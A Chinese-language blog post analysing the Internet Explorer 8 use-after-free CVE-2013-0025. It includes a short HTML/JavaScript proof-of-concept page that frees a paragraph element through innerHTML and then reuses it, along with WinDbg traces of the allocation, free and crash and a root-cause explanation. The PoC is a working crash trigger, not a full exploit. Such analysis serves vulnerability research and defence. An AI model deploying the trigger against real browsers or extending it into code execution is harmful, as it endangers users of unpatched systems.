CVE-2013-0025

Microsoft IE ‘SLayoutRun’释放后重用漏洞(CNNVD-201302-197)

        Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 
        Microsoft Internet Explorer 8中的SLayoutRun中存在释放后重用漏洞。通过特制网站触发对已删除对象的访问,远程攻击者可利用该漏洞执行任意代码。

 

测试环境

Windows7

IE 8.0.7600.16385

 

poc代码如下

<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);
document.body.style.whiteSpace = "pre-line";
setTimeout("document.body.innerHTML = 'i'",100);
</script>
</body>
</html>
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
 1 1:022> !heap -p -a esi
 2     address 07620fd8 found in
 3     _DPH_HEAP_ROOT @ 1a1000
 4     in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
 5                                     75e06e8:          7620000             2000
 6     6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
 7     77895674 ntdll!RtlDebugFreeHeap+0x0000002f
 8     77857aca ntdll!RtlpFreeHeap+0x0000005d
 9     77822d68 ntdll!RtlFreeHeap+0x00000142
10     771af1ac kernel32!HeapFree+0x00000014
11     6a2a930e mshtml!operator delete[]+0x00000016
12     6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
13     6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
14     6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
15     6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
16     6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
17     6a1f6f39 mshtml!CDoc::Remove+0x00000018
18     6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
19     6a1f7aef mshtml!InjectHtmlStream+0x00000191
20     6a1f793e mshtml!HandleHTMLInjection+0x0000005c
21     6a1f71fa mshtml!CElement::InjectInternal+0x00000307
22     6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
23     6a1f988c mshtml!CElement::put_innerHTML+0x00000040
24     6a3372d6 mshtml!GS_BSTR+0x000001ac
25     6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
26     6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
27     6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
28     6a2d3104 mshtml!PlainInvokeEx+0x000000eb
29     6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
30     6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
31     6c75a3f6 jscript!InvokeDispatchEx+0x00000098
32     6c75a4a0 jscript!VAR::InvokeByName+0x00000139
33     6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
34     6c759c0e jscript!CScriptRuntime::Run+0x0000208d
35     6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
36     6c765bfb jscript!ScrFncObj::Call+0x0000008d
37     6c765e11 jscript!CSession::Execute+0x0000015f

重利用:

1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????

分配:

1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CElement::CElement:
6830480f 8bff            mov     edi,edi
1:021> dd eax
077e6fd8  00000000 00000000 00000000 00000000
077e6fe8  00000000 00000000 00000000 00000000
077e6ff8  00000000 00000000 ???????? ????????
077e7008  ???????? ???????? ???????? ????????
077e7018  ???????? ???????? ???????? ????????
077e7028  ???????? ???????? ???????? ????????
077e7038  ???????? ???????? ???????? ????????
077e7048  ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr  Args to Child              
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])

释放:

(68327ec0)   mshtml!CParaElement::`vftable'   |  (68328169)   mshtml!CStyleSelector::SetSelectorPart
Exact matches:
    mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr  Args to Child              
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????

 

尝试对应到js语句中

修改POC

<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);
document.body.style.whiteSpace = "pre-line";
Math.sin(0);
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);
</script>
</body>
</html>

 UAF元素CParaElement是由

<p> </p>

导致创建的

1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b    jmp     dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!sin:
6be7d711 ff256810e56b    jmp     dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
jscript!cos:
6be7d67f ff259010e56b    jmp     dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????

释放可以根据回溯中的CElement::put_innerHTML分析得出是POC的document.body.innerHTML = 'i'所导致

没有明显的js语句对应于重用

 

漏洞原因分析

这个漏洞的成因在于CTreeNode没有被释放存在有CParaElement对象的悬垂指针,而CTreeNode没有被释放的原因在于被CTreeDataPos对象错误的引用。

 

posted @ 2016-08-19 23:01  Ox9A82  阅读(466)  评论(0编辑  收藏  举报